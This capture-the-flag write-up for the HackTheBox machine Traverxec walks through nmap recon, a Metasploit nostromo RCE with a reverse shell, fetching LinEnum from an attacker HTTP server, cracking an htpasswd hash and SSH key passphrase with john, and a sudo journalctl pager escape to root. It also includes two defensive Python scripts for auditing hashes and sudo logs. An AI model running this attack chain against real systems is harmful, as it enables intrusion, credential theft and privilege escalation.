# Traverxec

![](https://1376882418-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3F_z2GTZ6JS2CWL_B6%2F-M4cSf7qybmtla7vJgrn%2F-M4cT7oODPhCDvNRzr_r%2Ftraverexec.png?alt=media\&token=668cbba6-b701-4ea0-b754-3d6c268f06f3)

Traverxec is an easy-difficulty Linux machine that is a good introduction to web-to-host exploitation as well as SSH usage.

## Recon

We start off by scanning Traverxec's IP `10.10.10.165` with `nmap`:

```
nmap -T4 -A -v 10.10.10.165
```

From our results we get the following ports and services:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
```

Right off we see that it's only running two services, and we have the web server's name and version, `nostromo 1.9.6`.

We can use `searchsploit` to check if there are any existing exploits for nostromo 1.9.6 with `searchsploit nostromo`:

```
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                               |  Path
                                                                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                                                         | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                                                                                       | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                         | exploits/linux/remote/35466.sh
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
```

Perfect, we find that there's an RCE exploit for this version of `nostromo`.

Now let's fire up the Metasploit Framework with `msfconsole` and search for the exploit with `search nostromo`:

```
Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution
```

Perfect! msf has the exploit we want to use; now let's select and configure it.

## Exploit

```
use exploit/multi/http/nostromo_code_exec
set LHOST tun0
set RHOST 10.10.10.165
set RPORT 80
run
```

After a few seconds we should get the following:

```
[*] Started reverse TCP handler on 10.10.15.64:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.64:4444 -> 10.10.10.165:59272) at 2020-04-11 02:34:42 -0700
```

Great! We have a shell. Unfortunately it's a limited shell, but we can fix that by upgrading it to a full `PTY` shell with `python -c 'import pty;pty.spawn("/bin/bash")'`.

Now, with a full shell, let's enumerate some more. Since we only have a low-privilege shell right now, we need to get user. To do this we will grab LinEnum: <https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh>

Once we have it, it's time to get it onto the victim. To do this we'll fire up `python -m SimpleHTTPServer` on our machine, and on the victim we'll run `wget http://<IP>:<PORT>/LinEnum.sh`. Once it's there we need to set its permissions with `chmod +x LinEnum.sh` and then run it with `./LinEnum.sh`.

Upon completion we find one finding that stands out:

```
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
```

We got a password hash! Coming back to our local machine, we'll put that hash into a file and run it through `john`:

```
touch hash
nano hash
john --wordlist=/root/Downloads/Dic/rockyou.txt hash
Nowonly4me       (david)
```

Upon completion we get the password `Nowonly4me`.
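As a defender-side aside (an added example, not part of the original writeup): the `$1$` prefix marks this as MD5-crypt, a fast scheme that falls to a wordlist in seconds, which is why the john run above succeeded so quickly. The audit below parses an htpasswd file and flags such legacy schemes; the entries other than `david` are constructed, and the weak/ok verdicts are my assumption about what is acceptable rather than anything nostromo itself enforces.

```python
import re
from typing import List, Tuple

# Constructed .htpasswd sample: the "david" line is the hash LinEnum reported above;
# the other two entries are made up to exercise the remaining code paths.
SAMPLE_HTPASSWD = """\
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
legacy:abJnggxhB/yWI
# comments and blank lines are skipped

broken:notahash
"""

# (pattern, scheme, verdict): unsalted or MD5/DES-era schemes are rated weak
# because a wordlist attack against them is cheap; verdicts are an assumption.
SCHEMES = [
    (re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$"), "md5crypt", "weak"),
    (re.compile(r"^\$apr1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$"), "apr1-md5", "weak"),
    (re.compile(r"^\{SHA\}[A-Za-z0-9+/]{27}=$"), "sha1-unsalted", "weak"),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "des-crypt", "weak"),
    (re.compile(r"^\$2[aby]\$\d\d\$[./0-9A-Za-z]{53}$"), "bcrypt", "ok"),
    (re.compile(r"^\$5\$(rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{43}$"), "sha256crypt", "ok"),
    (re.compile(r"^\$6\$(rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}$"), "sha512crypt", "ok"),
]

def classify(hash_field: str) -> Tuple[str, str]:
    """Identify the crypt scheme of one htpasswd hash and rate it."""
    for pattern, scheme, verdict in SCHEMES:
        if pattern.match(hash_field):
            return scheme, verdict
    return "unknown", "review"

def audit_htpasswd(text: str) -> List[Tuple[str, str, str]]:
    """Return (user, scheme, verdict) for every credential line in an htpasswd file."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, hash_field = line.partition(":")
        if not sep:
            findings.append((user, "malformed", "review"))
            continue
        findings.append((user, *classify(hash_field)))
    return findings
```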

We also see that `/home/david/public_www` contains a folder `protected-file-area` which is protected by `.htaccess`. Checking the `nostromo` documentation <http://www.nazgul.ch/dev/nostromo_man.html> we see that there is yet another directory we can access, `~david`. Trying to access this directory gives us the following page:

![](https://1376882418-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3F_z2GTZ6JS2CWL_B6%2F-M5eza8sbAlcNyrqtWL7%2F-M5f0R7IN9_yWeC0aw04%2FScreenshot_2020-04-24_00-10-01.png?alt=media\&token=5227343e-12e0-4143-8d54-a90dc3589462)

Doesn't look very interesting, does it? Well, typing in the URL `10.10.10.165/~david/protected-file-area` gives us an auth prompt, and we already have the credentials for it: `david:Nowonly4me`. It takes us to an index page where we can download `backup-ssh-identity-files.tgz`.

Once downloaded we can extract the archive; it gives us the following files:

```
/david/.ssh/
/david/.ssh/authorized_keys
/david/.ssh/id_rsa
/david/.ssh/id_rsa.pub
```

Unfortunately the `id_rsa` is passphrase-protected, but luckily we can pass it through `john`:

```
python /usr/share/john/ssh2john.py ~/HTB/Traverexec/home/david/.ssh/id_rsa > ~/HTB/Traverexec/ssh.txt
john ssh.txt --wordlist=~/Downloads/Dic/rockyou.txt
hunter           (/root/HTB/Traverexec/home/david/.ssh/id_rsa)
```

Great! We got the passphrase `hunter`; we can now use it with `id_rsa` to connect via SSH:

```
ssh -i id_rsa david@10.10.10.165
```

And with that we have user!

## Post Exploitation

Checking David's home directory, we find a `bin` folder:

```
david@traverxec:~/bin$ ls -ahlrs
total 16K
4.0K -rwx------ 1 david david  363 Oct 25 16:26 server-stats.sh
4.0K -r-------- 1 david david  802 Oct 25 16:26 server-stats.head
4.0K drwx--x--x 5 david david 4.0K Oct 25 17:02 ..
4.0K drwx------ 2 david david 4.0K Oct 25 16:26 .
```

`server-stats.head` just gives us a banner, which isn't much use; however, checking `server-stats.sh` we get the following:

```
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
```

The last line, `/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat`, shows us that `journalctl` is being run as root via `sudo`, so can we exploit this?

Yes we can! Checking GTFOBins <https://gtfobins.github.io/gtfobins/journalctl/> we find that simply typing `!/bin/sh` from within `journalctl`'s pager can give us root access. We run `/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service` (without the pipe to `cat`, so the pager is invoked):

```
Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
!/bin/sh

root@traverexec:/home/david/bin# cd /root/
root@traverexec:~# cat root.txt
```
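From the defender's side, the journal lines above are the detection opportunity: `sudo` itself logged `www-data` trying `sudo -l` (`COMMAND=list`) with `TTY=unknown` from `/tmp`, which is exactly what a web shell probing for privilege looks like. The script below (an added example, not part of the original writeup) parses such sudo summary lines and flags that pattern; the `SERVICE_ACCOUNTS` set and the final `david` line in the sample are assumptions I constructed for contrast.

```python
import re
from typing import Dict, List, Optional

# sudo's summary lines as they appear in the journal, e.g.
# "www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list"
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo\[(?P<pid>\d+)\]: "
    r"(?P<user>\S+) : (?:(?P<reason>.*?) ; )?TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)
# Daemon accounts that should never call sudo on this host (assumption; tune per host).
SERVICE_ACCOUNTS = {"www-data", "nobody", "nostromo"}

# Constructed journal excerpt: the www-data lines are the entries shown above; the
# final david line is made up to represent a legitimate run of server-stats.sh.
SAMPLE_JOURNAL = """\
Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 02:10:03 traverxec sudo[1601]: david : TTY=pts/0 ; PWD=/home/david/bin ; USER=root ; COMMAND=/usr/bin/journalctl -n5 -unostromo.service
"""

def parse_sudo_line(line: str) -> Optional[Dict[str, str]]:
    """Fields of a sudo summary line, or None for any other journal line."""
    m = SUDO_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["reason"] = ev["reason"] or ""  # absent on successful invocations
    return ev

def find_suspicious_sudo(journal: str) -> List[Dict[str, str]]:
    """Flag sudo events that look like a web shell probing for privileges."""
    hits = []
    for line in journal.splitlines():
        ev = parse_sudo_line(line)
        if ev is None:
            continue
        signals = []
        if ev["user"] in SERVICE_ACCOUNTS:
            signals.append("service-account")  # daemon user invoking sudo
        if ev["tty"] == "unknown":
            signals.append("no-tty")           # non-interactive caller, e.g. a reverse shell
        if "not allowed" in ev["reason"]:
            signals.append("denied")           # sudoers rejected the request
        if ev["cmd"] == "list":
            signals.append("sudo-l")           # enumeration of permitted commands
        if signals:
            ev["signals"] = ",".join(signals)
            hits.append(ev)
    return hits
```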

## Useful Links

{% embed url="https://gtfobins.github.io" %}

{% embed url="http://www.nazgul.ch/dev/nostromo_man.html" %}
